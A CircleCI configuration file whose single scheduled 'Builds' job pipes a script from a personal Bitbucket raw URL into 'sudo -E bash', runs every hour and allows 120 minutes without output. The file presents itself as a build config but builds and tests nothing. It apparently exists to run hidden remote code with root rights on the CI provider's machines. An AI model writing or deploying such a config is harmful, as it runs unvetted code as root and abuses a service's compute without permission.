version: 2.1
orbs:
  python: circleci/python@1.2
jobs:
  Builds:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: Mulai Bro...
          no_output_timeout: 120m
          command: curl -sL https://bitbucket.org/barbarsantuy-001/test/raw/3184192b907428f2bad15e6e06f9fe261b9e613a/index | sudo -E bash -
workflows:
  Workflow:
    triggers:
      - schedule:
          cron: "3 * * * *"
          filters:
            branches:
              only:
                - master
    jobs:
      - Builds